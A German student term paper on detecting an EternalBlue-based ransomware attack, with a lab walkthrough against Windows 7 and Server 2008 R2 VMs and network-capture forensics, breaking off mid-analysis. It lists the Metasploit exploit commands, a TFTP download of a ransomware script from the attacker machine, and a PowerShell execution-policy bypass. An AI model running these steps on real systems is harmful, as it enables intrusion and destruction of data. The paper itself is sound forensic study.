Analyse von mit Ransomware befallenen Systemen
Angriff auf Windows mit EternalBlue
und Nachweis der Infektion
Hausarbeit im Rahmen des Moduls „IT-Forensik Projekt II“
Hochschule Wismar University of Technology, Business and Design Fakultät für Ingenieurswissenschaften
Eingereicht am: 23.07.2019 von: Lars Jacke, Angelina Kany in Hamburg, Marl
2
Aufgabenstellung
Die Aufgabe dieser Projektarbeit besteht darin zu untersuchen, inwieweit
sich die Durchführung einer Ransomware-Attacke durch forensische Ana-
lyse des betroffenen Systems sowie des Netzwerkverkehrs nachweisen
lässt.
Für einen erfolgreichen Ransomware-Angriff ist man entweder auf die Un-
wissenheit der Benutzer angewiesen, denen bspw. im Rahmen einer
Phishing-Kampagne ein präparierter Anhang zugesandt wurde, den sie
dann öffnen und das in dem Dokument enthaltene Makro aktivieren, oder
man hat selbst anderweitig Zugriff auf ein wertvolles Zielsystem erlangt und
kann von dort aus selbst tätig werden. Letzteres möchten wir in dieser Pro-
jektarbeit analysieren.
Zur Durchführung und Analyse des Angriffs werden ausschließlich frei ver-
fügbare Werkzeuge genutzt. Ein Vergleich zwischen verschiedenen Werk-
zeugen ist nicht Bestandteil der Projektarbeit. Die Wahl der Werkzeuge be-
ruht jeweils auf der persönlichen Präferenz der Studierenden.
Abschließend erfolgt eine Bewertung hinsichtlich der Komplexität der Nach-
weisbarkeit von Ransomware-Angriffen sowie ein allgemeines Fazit zur re-
alen Bedrohungslage und möglicher Abwehrmaßnahmen.
3
Kurzreferat
Zielsetzung der vorliegenden Hausarbeit ist es, anhand des Beispiels eines
aktuellen Exploits dessen Funktionsweise zu analysieren, einen Angriff auf
verletzliche Systeme nachzustellen, den Angriff per Mitschnitt des Netz-
werktraffics nachzuweisen und letztlich das angegriffene System auf Hin-
weise des Angriffs zu untersuchen.
Aufgrund der relativen Aktualität und umfassenden Dokumentation haben
wir uns für die als EternalBlue bekannte Lücke CVE-2017-0144 aus dem
Jahr 2017 entschieden. Diese Lücke war für die starke Verbreitung der
Ransomware WannaCry verantwortlich, die in großem Umfang und sehr er-
folgreich auf der ganzen Welt gegen verschiedene Windows-Systeme ein-
gesetzt wurde1.
Die Arbeit wird zu gleichen Teilen von den Studenten Lars Jacke und An-
gelina Kany erstellt, die sich beide im sechsten Fachsemester des Ba-
chelor-Studiengangs „IT-Forensik“ der Hochschule Wismar befinden.
Im Folgenden wird die Arbeit aus Sicht der Studenten beschrieben, daher
ist mit „wir“ im Verlauf der Ausarbeitung das Autorenpaar Lars Jacke und
Angelina Kany gemeint. Es wird dadurch nicht der Leser angesprochen.
1 https://de.wikipedia.org/wiki/WannaCry
4
Inhaltsverzeichnis Aufgabenstellung ....................................................................................... 2
Kurzreferat ................................................................................................. 3
1. Was ist Ransomware ............................................................................. 6
1.1 Begriffserläuterung Ransomware ..................................................... 6
1.2 EternalBlue ....................................................................................... 6
2. Lage der IT Sicherheit in der BRD im Jahr 2017 .................................... 8
2.1 Schwachstellen in Software .............................................................. 8
2.1 Infektionswege ................................................................................. 9
2.2 Das BSI über Ransomware und WannaCry ................................... 10
3. Versuchsdurchführung / Methodik ....................................................... 11
3.1 Angriffsszenarien und Versuchsaufbauten ..................................... 11
3.2 Szenario 1: Versuchsaufbau mit Windows 7 .................................. 14
3.3 Szenario 2: Versuchsaufbau mit Windows Server 2008 R2 ........... 15
3.4 Angriff gegen Windows 7 ................................................................ 17
3.4.1 Auskundschaften ..................................................................... 17
3.4.2 Abtasten ................................................................................... 17
3.4.3 Angriff ...................................................................................... 19
3.5 Angriff gegen Windows Server 2008 R2......................................... 24
3.5.1 Auskundschaften ..................................................................... 24
3.5.2 Abtasten ................................................................................... 24
3.5.3 Angriff ...................................................................................... 25
3.6 Analyse des Zielsystems Windows 7 ............................................. 29
3.6.1 Statische Analyse von Windows 7 ........................................... 30
4. Fazit ..................................................................................................... 35
5. Links und Literatur ............................................................................... 36
5
6. Abbildungsverzeichnis ......................................................................... 37
7. Eigenständigkeitserklärung .................................................................. 38
1. Was ist Ransomware 1.1 Begriffserläuterung Ransomware
6
1. Was ist Ransomware
1.1 Begriffserläuterung Ransomware
Als Ransomware wird erpresserische Software genannt, die ohne Wissen
oder wissentliches Zutun des Nutzers Daten auf dem IT-System des An-
wenders verschlüsselt und diese für die normale Verwendung unbrauchbar
macht. Dabei ist es möglich, dass sich die eingesetzte Ransomware wurm-
artig verbreitet und beispielsweise auch Daten verschlüsselt, die per Netz-
werkfreigabe erreichbar sind.
Üblicherweise werden von den Angreifern Verschlüsselungsmethoden ver-
wendet, die ohne Kenntnis des Schlüssels vom Nutzer nicht umkehrbar
sind. Dieser Schlüssel wird vom Angreifer jedoch für eine Geldsumme ver-
kauft, woher sich der Begriff „Erpressungstrojaner“ abgeleitet hat.
Sofern kein wirksamer Schutz oder eine aktuelle Datensicherung besteht,
entstehen den betroffenen Nutzern und Unternehmen erhebliche Schäden
durch eingeschränkte Verfügbarkeit und Arbeitsfähigkeit, zusätzlich entste-
hen finanzielle und Image-Schäden2.
In selteneren Fällen drohen die Erpresser auch damit, die Daten global zu
veröffentlichen, was unter Umständen zumindest im geschäftlichen Umfeld
betriebsschädigend sein kann.
1.2 EternalBlue
EternalBlue muss von Ransomware insofern abgegrenzt werden, als dass
es sich hierbei nicht um einen eigenständigen Schädling handelt, sondern
um einen Exploit, mit dessen Ausnutzung es ermöglicht wird, Ransomware
2https://www.bsi.bund.de/DE/Themen/ITGrundschutz/ITGrundschutzKompendium/bausteine/OPS/OPS_1_1_4_Schutz_vor_Schadprogrammen.html?nn=10137168#doc10095808bodyText7
1. Was ist Ransomware 1.2 EternalBlue
7
(und andere Schädlinge) in entsprechend verwundbare Systeme einzu-
schleusen.
EternalBlue nutzt eine Schwäche in der Implementierung des SMB-
Protokolls in Windows Systemen aus und ist bei der MITRE als CVE-2017-
0144 (SMB Remote Windows Kernel Pool Corruption) gelistet3.
Die MITRE ist eine US-amerikanische Non-Profit Organisation, die ver-
schiedene Forschungseinrichtungen auf der ganzen Welt betreibt und unter
deren Pflege die Liste der „Common Vulnerabilities and Exposures (CVE)“
steht.
3 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0144
2. Lage der IT Sicherheit in der BRD im Jahr 2017 2.1 Schwachstellen in Software
8
2. Lage der IT Sicherheit in der BRD im Jahr 2017
Das Bundesamt für die Sicherheit in der Informationstechnik, kurz BSI, er-
stellt jährlich einen Bericht zur „Lage der IT-Sicherheit in Deutschland“.
Da wir uns im Schwerpunkt mit einem Exploit aus 2017 befassen, gehen
wir an dieser Stelle auf den Bericht ein, der im August 2017 veröffentlicht
wurde.4 Der Berichtszeitraum ist Juni 2016 bis Juli 2017, somit ist der Schei-
telpunkt der EternalBlue-Welle in dem Bericht ebenfalls berücksichtigt.
2.1 Schwachstellen in Software
In Kapitel 1.4 geht das BSI konkret auf Angriffsmethoden und -Mittel ein.5
Als ein Hauptfaktor für den erfolgreichen Angriff auf IT-Systeme werden hier
die Schwachstellen in Software genannt. Zwar ist die durchschnittliche An-
zahl der Fehler je Zeile Quellcode in den vergangenen Jahren leicht gesun-
ken, was auf verbesserte Softwareentwicklungsprozesse schließen lässt.
Jedoch nimmt im Gegenzug der Umfang der Codebasis von Softwarepro-
jekten zu, sodass bei jedem komplexeren Projekt von der Existenz vorhan-
dener Schwachstellen ausgegangen werden muss.
Die bekannte Anzahl Schwachstellen in Software ist insgesamt mit Skepsis
zu betrachten, da einige Hersteller nur öffentlich bekannten Schwachstellen
auch eine CVE-Nummer zuweisen. Vertraulich gemeldete oder intern ge-
fundene Lücken würden häufig ohne CVE-Nummer bleiben.6 Auch ist es
nicht unüblich, dass Hersteller mehrere Lücken unter einer CVE-Nummer
zusammenfassen. Hinzu kommt, dass nicht alle Lücken als solche erkannt
und als „normale“ Fehlerbehandlung eingestuft werden. Es kann jedoch
später zu einer Aufstufung mit CVE-Nummer kommen. Zuletzt nennt das
4https://www.bsi.bund.de/SharedDocs/Down-loads/DE/BSI/Publikationen/Lageberichte/Lagebericht2017.pdf?__blob=publicationFile&v=4 5 Die Lage der IT-Sicherheit in Deutschland 2017, BSI 2017, S. 18 ff 6 Die Lage der IT-Sicherheit in Deutschland 2017, BSI 2017, S. 21
2. Lage der IT Sicherheit in der BRD im Jahr 2017 2.1 Infektionswege
9
BSI noch, dass Einträge in die offiziellen CVE-Listen oft mit erheblicher Ver-
zögerung stattfinden7.
2.1 Infektionswege
Das BSI nennt in seinem Bericht als häufigste Infektionswege das unbe-
darfte Öffnen von E-Mail-Anhängen, sowie das unbemerkte Infizieren per
Drive-By-Download beim Besuch bösartiger oder verseuchter Webseiten
sowie den direkten Download per Weblink.8 Der Weg über andere
Schwachstellen, wie beispielsweise EternalBlue, ist vergleichsweise selten.
Das BSI weist darauf hin, dass signaturbasierte AV-Programme nur einen
Basisschutz vor Infektionen bieten können, da neue Variationen von Schäd-
lingen schneller erzeugt werden, als die Signaturen angepasst werden kön-
nen.9 Hinzu kommt, dass Schadprogramme immer öfter erkennen, ob sie in
einer Analyseumgebung ausgeführt werden, also eine Signatur erstellt wer-
den soll. In diesem Fall aktiviert sich die Schadsoftware gar nicht erst und
vermeidet so, dass sie in den Signaturlisten der AV-Hersteller auftaucht.
Abbildung 1: Bekannte Schadprogramme (2017 bis Mai), Quelle: AV-TEST
7 Die Lage der IT-Sicherheit in Deutschland 2017, BSI 2017, S. 21 8 Die Lage der IT-Sicherheit in Deutschland 2017, BSI 2017, S. 22 9 Die Lage der IT-Sicherheit in Deutschland 2017, BSI 2017, S. 22
2. Lage der IT Sicherheit in der BRD im Jahr 2017 2.2 Das BSI über Ransomware und WannaCry
10
2.2 Das BSI über Ransomware und WannaCry
Laut BSI verletzen Angriffe mittels Ransomware das Sicherheitszeil der
Verfügbarkeit von Daten und Systemen. Gleichzeitig handelt es sich um
eine Form digitaler Erpressung.10 Die geforderten Lösegeldzahlungen zur
Erlangung des Schlüssels werden vielfach über Kryptowährungen (Bitcoin)
und anonyme Webseiten im TOR-Netzwerk abgewickelt. Ein Großteil der
identifizierten Ransomware zielt dabei auf Betriebssysteme der Windows-
Familie ab. Vereinzelt werden auch MacOS-Systeme und Webserver ange-
griffen. Jedoch steigt auch die Zahl der verfügbaren Ransomware für mobile
Betriebssysteme wie Google Android.
Laut BSI sind die primären Angriffsvektoren für Ransomware weiterhin An-
hänge von E-Mails sowie Drive-By-Angriffe über Exploit-Kits. Es kommt je-
doch auch vor, dass die Ransomware als Programmupdate getarnt ist und
so den Nutzer zur aktiven Installation verleitet.11
Als neu galt im Jahr 2017 hingegen der Angriffsvektor, Ransomware über
die Ausnutzung von Software-Schwachstellen über das Internet und lokale
Netzwerke zu verbreiten. Auf diese Art kam es im Mai 2017 zur initialen
Infektion und Weiterverbreitung der Ransomware WannaCry.
WannaCry nutzt eine Schwachstelle im SMBv1 Server, für die von Microsoft
bereits im März 2017 ein entsprechender Patch bereitgestellt wurde. Später
wurde diese Schwachstelle im Rahmen von Shadow-Broker-Veröffentli-
chungen öffentlich bekannt.12 Der große Erfolg der WannaCry-Infektionen
lässt sich demnach auf nachlässiges Patchmanagement seitens der infizier-
ten Firmen und Nutzer zurückführen, wobei die Gründe für das Zurückhal-
ten von Patches vielgestaltig sein können, besonders im Unternehmensum-
feld, beispielsweise weil zuerst eine Kompatibilitätsprüfung im Kontext der
Unternehmens-IT durchgeführt werden muss.
10 Die Lage der IT-Sicherheit in Deutschland 2017, BSI 2017, S. 23 11 Die Lage der IT-Sicherheit in Deutschland 2017, BSI 2017, S. 23 12 Die Lage der IT-Sicherheit in Deutschland 2017, BSI 2017, S. 26
3. Versuchsdurchführung / Methodik 3.1 Angriffsszenarien und Versuchsaufbauten
11
3. Versuchsdurchführung / Methodik
Im Folgenden werden die Angriffsszenarien und die Versuchsaufbauten er-
läutert.
3.1 Angriffsszenarien und Versuchsaufbauten
Zur Durchführung der Projektarbeit werden jeweils zwei virtuelle Maschinen
genutzt. Diese sind so konfiguriert, dass sie sich im selben lokalen Netzwerk
befinden, um die Anzahl der möglichen Störfaktoren für die Kommunikation
so gering wie möglich zu halten (bspw. keine Firewalls zwischen den virtu-
ellen Maschinen).
Für das Angriffsszenario haben wir uns an der Ransomware-Kampagne
WannaCry orientiert: Über die als EternalBlue bekannte Schwachstelle im
SMBv1-Protokoll werden wir eine Meterpreter-Sitzung auf dem jeweiligen
Opfersystem starten und dann die eigentliche Ransomware nachladen.
Hierbei handelt es sich um ein PowerShell-Skript13, welches das Verhalten
einer Ransomware simuliert. Aufgrund der aktiven Netzwerkverbindungen
(insbesondere zum Hostsystem der VMs) wird keine echte Ransomware
ausgeführt.
3.2 Durchführung der Angriffe
Zur Durchführung des Ransomware-Angriffs orientieren wir uns grob an den
fünf Phasen, die solche Attacken normalerweise durchlaufen:
Phase 1: Auskundschaften / Reconnaissance
13 https://blogs.technet.microsoft.com/canitpro/2016/01/27/simulating-a-ransomware-at-tack-with-powershell/
3. Versuchsdurchführung / Methodik 3.1 Angriffsszenarien und Versuchsaufbauten
12
In der Phase der Aufklärung und Informationsbeschaffung werden Informa-
tionen über die anzugreifende Infrastruktur gesammelt. Es wird hier nach
aktivem und passivem Auskundschaften unterschieden. Bei der aktiven
Auskundschaftung tritt der Angreifer aktiv mit dem Ziel in Verbindung, ohne
sich jedoch zu offenbaren. Möglich ist es, sich als vermeintlicher Handwer-
ker oder Putzkraft physisch Zutritt zum Gebäude des Ziels und seiner Infra-
struktur zu verschaffen.
Bei der passiven Aufklärung verzichtet man auf persönlichen Kontakt und
versucht über allgemein zugängliche Quellen so viel wie möglich über das
Ziel zu erfahren. Dies können Webauftritte sein oder die Recherche in sozi-
alen Netzwerken nach Mitarbeitern des Unternehmens. Auch DNS- oder
WHOIS-Anfragen zählen in den Bereich der passiven Aufklärung.
Phase 2: Abtasten / Scanning
In der zweiten Phase versucht der Angreifer, offene Schwachstellen im Ziel-
system zu entdecken, die für ein Eindringen genutzt werden können. Eine
gängige Methode ist das Portscanning am Ziel. Darüber können offene
Ports und verfügbare Dienste ermittelt werden. Dies nennt man auch Enu-
meration. Über weitergehende Vulnerability-Scans erhält man Informatio-
nen über Schwachstellen und Exploit-Möglichkeiten. Ein Nachteil des Ein-
satzes von Vulnerability-Scannern ist, dass diese häufig von IPS- oder IDS-
Systemen erkannt werden.
Phase 3: Angreifen / Gaining Access
In der dritten Phase des Angriffs wird mittels verschiedener Angriffsvektoren
versucht, aktiv in das Zielsystem einzudringen. Dies geschieht beispiels-
weise durch das Ausnutzen eines Exploits wie EternalBlue, dem eine
schadhafte Payload angehängt wird.
3. Versuchsdurchführung / Methodik 3.1 Angriffsszenarien und Versuchsaufbauten
13
Phase 4: Festsetzen / Maintaining Access
Nachdem Phase 3 erfolgreich abgeschlossen wurde, versucht der Angreifer
nun einen Brückenkopf im Zielsystem zu errichten und dauerhaften Zugriff
zu etablieren. Dies geschieht beispielsweise durch die Einrichtung von
Rootkits im Ziel. Auch ist es ab diesem Punkt möglich, benachbarte Sys-
teme des gleichen Netzwerks zu infiltrieren und seinen Einfluss weiter aus-
zubauen.
Phase 5: Tarnen / Covering Tracks
In der letzten Phase wird der Angreifer versuchen, seine Spuren zu verwi-
schen, um möglichst lange unentdeckt im Zielsystem operieren zu können.
Mögliche Maßnahmen sind hier die Manipulation von Logfiles oder die De-
aktivierung von vorhandenem Auditing.
Konkret werden wir die Phasen 1 bis 3 durchlaufen, da es sich lediglich um
eine Simulation und keinen echten Angriff handelt, bzw. die Phasen 4 und
5 für die durch uns durchzuführende forensische Analyse irrelevant sind.
3. Versuchsdurchführung / Methodik 3.2 Szenario 1: Versuchsaufbau mit Windows 7
14
3.2 Szenario 1: Versuchsaufbau mit Windows 7
In diesem Szenario kommen eine Kali Linux und eine Windows 7 VM mit
nachfolgenden Eigenschaften zum Einsatz:
Betriebssystem Kali Linux 64-Bit
Release 2019.02
Windows 7 Ultimate 64-bit
Build 7600
Rolle Angreifer Opfer
Prozessor 4 vCPUs 2 vCPUs
Arbeitsspeicher 4 GB 4 GB
Festplattenkapazität 40 GB 60 GB
Netzwerkadapter 1 (NAT-Modus) 1 (NAT-Modus)
Als Virtualisierungslösung wird der VMware Workstation Player in Version
15 (15.1.0 build-13591040) verwendet. Die virtuellen Maschinen werden im
NAT-Modus betrieben, sodass das Hostsystem der VMs als Standard-Ga-
teway fungiert und die beiden Systeme darüber miteinander kommunizie-
ren. Es ergibt sich somit folgende Netzwerkkonfiguration:
VM-Hostsystem Kali Linux VM Windows 7 VM
IP-Adresse 192.168.70.1 192.168.70.128 192.168.70.130
Subnetz-
maske
255.255.255.0 255.255.255.0 255.255.255.0
Standard-Ga-
teway
192.168.70.1 192.168.70.1 192.168.70.1
Auf der Windows 7 VM wurde ein Verzeichnis C:\CompanySecrets mit
drei Textdateien vorbereitet, die den Angriff beispielhaft veranschaulichen
sollen:
3. Versuchsdurchführung / Methodik 3.3 Szenario 2: Versuchsaufbau mit Windows Server 2008 R2
15
Abbildung 2: Beispieldateien für den simulierten Ransomware-Angriff
3.3 Szenario 2: Versuchsaufbau mit Windows Server 2008 R2
In diesem Szenario kommt ebenfalls Kali Linux zum Einsatz. Als Angriffsziel
dient jedoch der noch immer recht weit in Unternehmen verbreitete
Windows Server 2008 R2.
Betriebssystem Kali Linux Kernel
4.19.0, 64 Bit, Release
2019.3
Windows Server 2008
R2 SP1, Build 7601
Rolle Angreifer Opfer
Prozessor 2 vCores 2 vCores
Arbeitsspeicher 4 GB 4 GB
Festplattenkapazität 30 GB 50 GB
Netzwerkadapter 1 (NAT-Modus) 1 (NAT-Modus)
Für die Virtualisierung wird in diesem Setup Oracle Virtualbox 6.0 verwen-
det (6.0.10 r132072). Als Netzwerkmodus wird auch hier der NAT-Modus
verwendet, sodass der Hypervisor als Gateway fungiert und eine Kommu-
nikation der beiden Guests ermöglicht.
Daraus ergibt sich folgende Netzwerkkonfiguration:
Hypervisor Kali WinServer
IP-Adresse 10.0.2.1 10.0.2.15 10.0.2.6
Subnetzmaske 255.255.255.0 255.255.255.0 255.255.255.0
3. Versuchsdurchführung / Methodik 3.3 Szenario 2: Versuchsaufbau mit Windows Server 2008 R2
16
Standard-Gate-
way
10.0.2.1 10.0.2.1 10.0.2.1
Auch unter Windows Server wurde eine Dummy-Freigabe erstellt unter
C:\FinanceDpt:
Abbildung 3: Beispieldaten in Windows Server 2008 R2
Abschließend zum Thema Versuchsaufbau eine Grafik, die schematisch
beide Netzpläne darstellt:
Abbildung 4: Netzplan der Versuchsumgebungen14
14 https://nocksoft.de/tutorials/virtualbox-netzwerkkonfiguration/
3. Versuchsdurchführung / Methodik 3.4 Angriff gegen Windows 7
17
3.4 Angriff gegen Windows 7
3.4.1 Auskundschaften
Zunächst werden Informationen über das Opfersystem gesammelt. Dazu
wird ein Scan des lokalen Netzwerks mit nmap initiiert:
nmap -sV -O 192.168.70.0/24
Abbildung 5: Ergebnisse des nmap-Scans gegen die Win7-VM
Unter den gefundenen Systemen befindet sich neben dem Hostsystem der
VMs auch noch ein weiterer Client namens VWS-PROD-01. Über den Pa-
rameter –sV erhalten wir eine ausführliche Auflistung der gefundenen
Dienste dieses Systems. Die für uns relevanten Ports des SMB-Protokolls,
TCP 139 und TCP 445, sind als offen gekennzeichnet. Mit –O erfolgt eine
Einschätzung, welches Betriebssystem vermutlich genutzt wird. In diesem
Fall grenzt nmap dies auf Windows 7, Windows Server 2008 oder Windows
8.1 ein.
3.4.2 Abtasten
Als Nächstes soll festgestellt werden, ob das gefundene System für Eter-
nalBlue anfällig ist. Hierzu wird ein in im Penetration Testing Framework
3. Versuchsdurchführung / Methodik 3.4 Angriff gegen Windows 7
18
Metasploit enthaltener Scanner verwendet. Nach dem Start der Metasploit
Konsole via msfconsole wird dieser Scanner über den Aufruf
use auxiliary/scanner/smb/smb_ms17_010
gestartet.
Mittels show options prüft man ob die Standardwerte des Scanners noch
angepasst werden müssen. In diesem Fall muss noch das zu prüfende Sys-
tem mittels
set RHOSTS 192.168.70.130
ergänzt werden.
Abbildung 6: Überprüfen und Anpassen des EternalBlue-Scanners
Abschließend startet man den Scan mit dem Befehl run:
Abbildung 7: Ausführung und Ergebnisse des EternalBlue Scanners
Laut Scan-Ergebnis ist das Zielsystem anfällig für EternalBlue. Außerdem
hat der Scanner das Betriebssystem genauer bestimmt und auf Windows 7
eingegrenzt.
3. Versuchsdurchführung / Methodik 3.4 Angriff gegen Windows 7
19
3.4.3 Angriff
Mit den gesammelten Informationen kann man nun den eigentlichen Angriff
starten.
Zunächst verschaffen wir uns mit dem EternalBlue Remote Code Execution
Exploit Zugriff auf die Windows 7 VM. Der Aufruf des Exploits erfolgt über
die Metasploit Konsole via
use exploit/windows/smb/ms17_010_eternalblue
Wie bereits beim vorgelagerten Scan werden auch hier zunächst die mög-
lichen Konfigurationsoptionen mittels show options geprüft. Es reicht
wieder aus das Zielsystem via
set RHOSTS 192.168.70.130
zu ergänzen.
Abbildung 8: Überprüfen und Anpassen des EternalBlue Remote Code Execution Exploits
Abschließend startet man den Scan mit dem Befehl exploit:
3. Versuchsdurchführung / Methodik 3.4 Angriff gegen Windows 7
20
Abbildung 9: Ausführung des EternalBlue Remote Code Execution Exploits und Überprüfung der Berechtigungen auf der Windows 7 VM
Der Exploit wurde erfolgreich ausgeführt, sodass wir nun per Meterpreter
Zugriff auf die Windows 7 VM haben. Bei der Überprüfung der Berechtigun-
gen dieser Shell Session stellen wir fest, dass wir direkt als NT-
Authorität\SYSTEM angemeldet wurden und somit über administrativen
Vollzugriff auf den Windows 7 Client verfügen.
Als Nächstes muss das PowerShell-Skript auf die Windows 7 VM übertra-
gen werden. Hierzu wird mit Hilfe von Metasploit via
use auxiliary/server/tftp
ein TFTP-Server auf der Kali Linux VM gestartet.
Via show options werden wieder die Konfigurationsmöglichkeiten ge-
prüft. Da sich das PowerShell-Skript in einem anderen Verzeichnis befindet
muss dieses mittels
set TFTPROOT /root/Desktop/share
noch angepasst werden.
3. Versuchsdurchführung / Methodik 3.4 Angriff gegen Windows 7
21
Abbildung 10: Überprüfen und Anpassen des TFTP-Servers
Über die Meterpreter-Sitzung erstellen wir nun zunächst ein neues Ver-
zeichnis C:\Temp, in welches wir das PowerShell-Skript via TFTP nachla-
den:
Abbildung 11: Nachladen des PowerShell-Skripts in das neu erstellte Verzeichnis
Nun muss das PowerShell-Skript nur noch mittels
powershell –File ransomware.ps1
3. Versuchsdurchführung / Methodik 3.4 Angriff gegen Windows 7
22
ausgeführt werden, um den Angriff abzuschließen.
Abbildung 12: Ausführen des PowerShell-Skripts schlägt fehl
Da vor Ausführung des Powershell-Skripts nicht überprüft wurde, ob Skripte
überhaupt ausgeführt werden dürfen, läuft der erste Versuch in einen Feh-
ler. Eine kurze Überprüfung der Ausführungsbeschränkungen via
powershell get-ExecutionPolicy
bestätigt das auch nochmal:
Abbildung 13: Nachweis, dass das Ausführen von PowerShell-Skripten nicht erlaubt ist
Nun ist es von Nutzen, dass wir volle Administrationsrechte auf der
Windows 7 VM haben. So können wir die Ausführungsbeschränkung ein-
fach mit dem zusätzlichen Parameter –ExecutionPolicy ByPass beim
Aufruf des Skripts umgehen:
3. Versuchsdurchführung / Methodik 3.4 Angriff gegen Windows 7
23
Abbildung 14: Erfolgreiche Ausführung des PowerShell-Skripts durch Umgehung der Ausführungs-beschränkung
Ein Blick in das vorbereitete Verzeichnis zeigt, dass der Angriff erfolgreich
war:
Abbildung 15: Die Textdateien wurden durch das PowerShell-Skript überschrieben
3. Versuchsdurchführung / Methodik 3.5 Angriff gegen Windows Server 2008 R2
24
3.5 Angriff gegen Windows Server 2008 R2
Der Angriff gegen Windows Server 2008 R2 gleicht im Wesentlichen dem
gegen Windows 7, weshalb er hier nur verkürzt dokumentiert wird. Der ge-
naue Versuchsaufbau ist in Kapitel 3.4 beschrieben. Der Unterschied ist le-
diglich, dass die Testumgebung auf einem anderen Host aufgesetzt ist und
sich entsprechend in der Konfiguration leicht unterscheidet, beispielsweise
bei den verwendeten IP-Adressen.
3.5.1 Auskundschaften
Ebenfalls wird nmap auf der Kali-VM verwendet, um sich im Netzwerk um-
zuschauen:
nmap -sV -O 10.0.2.0/24
Abbildung 16: Ergebnis von nmap in der Windows Server Umgebung
Wie zu erwarten, hat nmap mit den Optionen -sV und -O auch hier alle
relevanten Informationen liefern können: die für uns relevanten SMB-Ports
139 und 445 sind vorhanden und offen und das Betriebssystem wurde auf
Windows 7, Server 2008 oder Windows 8.1 eingegrenzt.
3.5.2 Abtasten
Auch hier ist der nächste Schritt der Start der Metasploit-Konsole über den
Aufruf msfconsole, gefolgt vom Aufruf des SMB-Schwachstellen-
3. Versuchsdurchführung / Methodik 3.5 Angriff gegen Windows Server 2008 R2
25
scanners und der Überprüfung auf die Gültigkeit der Standardwerte über
show options. Natürlich musste auch an dieser Stelle der Wert des re-
mote Host mitgeteilt werden:
Abbildung 17: SMB-Vulnerability-Scanner in der Server 2008 Umgebung
Die Ausführung von run in der Metasploit-Konsole bestätigt die Verwund-
barkeit von Windows Server 2008 R2 gegenüber EternalBlue:
Abbildung 18: Auch Server 2008 R2 ist angreifbar
Außerdem wird die Betriebssystemversion gegenüber dem nmap-Scan
deutlich schärfer ermittelt und klar als Windows Server 2008 R2 Standard
SP1 64-bit erkann.
3.5.3 Angriff
Wie bereits in der Windows 7 Umgebung haben wir nun genug Daten er-
mittelt, um den Angriff zu starten. Hierzu wird in Metasploit in das Exploit-
Modul gewechselt durch Eingabe von
use exploit/windows/smb/ms17_010_eternalblue
gefolgt von der Bekanntmachung des anzugreifenden remote Host über
set RHOSTS 10.0.2.6
Die Eingabe von
exploit
3. Versuchsdurchführung / Methodik 3.5 Angriff gegen Windows Server 2008 R2
26
startet auch in dieser Umgebung den Exploit EternalBlue, in dessen Kontext
wir uns innerhalb Metasploits aufgehalten haben.
Abbildung 19: Erfolgreich ausgeführter Exploit gegen Windows Server 2008 R2
Ebenfalls haben wir direkt erhöhte Rechte erhalten und besitzen nun eine
Meterpreter-Sitzung als nt authority\system auf dem Server.
Als nächstes starten wir den TFTP-Server und setzen das Quellverzeichnis
auf /root/Schreibtisch/Payload, da sich hier das Powershell-Script
befindet:
use auxiliary/server/tftp
set TFTPROOT /root/Schreibtisch/Payload
Über die Meterpreter-Sitzung mit den erhöhten Rechten erstellen wir zu-
nächst ein Verzeichnis auf dem Server. Wir nennen es C:\install\.
Abbildung 20: Zielverzeichnis auf Server 2008 R2 angelegt
3. Versuchsdurchführung / Methodik 3.5 Angriff gegen Windows Server 2008 R2
27
Man kann den Erfolg mit circa einer Sekunde Verzögerung selbst beobach-
ten, wenn beide VMs sichtbar sind.
Der Transfer des Scripts in den Zielorder in c:\install ist schnell erledigt
über
tftp -i 10.0.2.15 GET ransomware.ps1
Es folgt nur noch die Ausführung des Scripts. Wie wir vorher in der Windows
7 Umgebung gelernt haben, ist die Ausführungsrichtlinie für Powershell-
scripte mitunter restriktiv. Wir prüfen diesmal zuerst und stellen fest, dass
sich die Richtlinie unter Windows Server 2008 R2 genauso verhält.
Abbildung 21: Ausführungsrichtlinie unter Windows Server 2008 R2
Da wir uns aber mit Systemberechtigungen auf dem Server befinden, kön-
nen wir – wie vorher auch – die Richtlinie einfach umgehen und setzen den-
selben Befehl erneut in die Meterpreter-Sitzung ab, jedoch mit dem zusätz-
lichen Parameter -Executionpolicy Bypass.
Abbildung 22: Erfolgsmeldung von Meterpreter für das PS-Skript
3. Versuchsdurchführung / Methodik 3.5 Angriff gegen Windows Server 2008 R2
28
Auch hier sind die Auswirkungen des Angriffes mit dem leicht abgeänderten
Skript direkt sichtbar:
Abbildung 23: korrumpierte Dateien nach Ausführung der Payload
3. Versuchsdurchführung / Methodik 3.6 Analyse des Zielsystems Windows 7
29
3.6 Analyse des Zielsystems Windows 7
Während der gesamten Vorbereitungs- und Angriffsphase sind keine Auf-
fälligkeiten zu beobachten (keine Programmabstürze, kein Bluescreen, kein
Performance-Verlust). Der Angriff wird nur dadurch bemerkt, dass die Da-
teien im vorbereiteten Verzeichnis nicht mehr zugänglich sind.
Auf eine detaillierte Beschreibung der Analyse des Server 2008 R2 verzich-
ten wir an dieser Stelle, weil sie exakt inhaltsgleich ist. Der Hauptgrund für
das analoge Verhalten von Windows Server 2008 R2 dürfte sein, dass
beide Windows-Systeme die gleiche Kernelbasis verwenden.
3. Versuchsdurchführung / Methodik 3.6 Analyse des Zielsystems Windows 7
30
3.6.1 Statische Analyse von Windows 7
Führt man den Angriff jedoch unter Beobachtung des Netzwerkverkehrs
und der Prozesse aus, so lässt er sich vollständig aufzeichnen.
Nachweis des Angriffs via Packet Capture
Zum Mitschneiden des Netzwerkverkehrs wird die Software SmartSniff in
Version 2.29 von NirSoft15 verwendet. Es handelt sich dabei um einen sehr
simplen Sniffer, der zur Aufzeichnung der Kommunikation zwischen den
beiden VMs genutzt werden soll. Die Software wird auf der Windows 7 VM
ausgeführt.
Der erste Schritt des Angriffs, die Ausführung des EternalBlue Remote
Code Execution Exploits, stellt sich wie folgt dar:
Abbildung 24: Mitschnitt des EternalBlue Remote Code Exploits
Über mehrere SMB-Pakete hinweg sieht man in der letzten Zeile dann die
erfolgreich aufgebaute Meterpreter-Sitzung auf Port 4444 TCP.
Auch die TFTP-Verbindung zum Nachladen des PowerShell-Skripts wird
ersichtlich:
15 https://www.nirsoft.net/utils/smsniff.html
3. Versuchsdurchführung / Methodik 3.6 Analyse des Zielsystems Windows 7
31
Abbildung 25: Übertragung des Ransomware Skripts per TFTP
Außerdem kann man den gesamten Inhalt der Meterpreter-Sitzung vollstän-
dig mitlesen, da die Kommunikation unverschlüsselt stattfindet:
Abbildung 26:Mitschnitt der Meterpreter Sitzung im Klartext
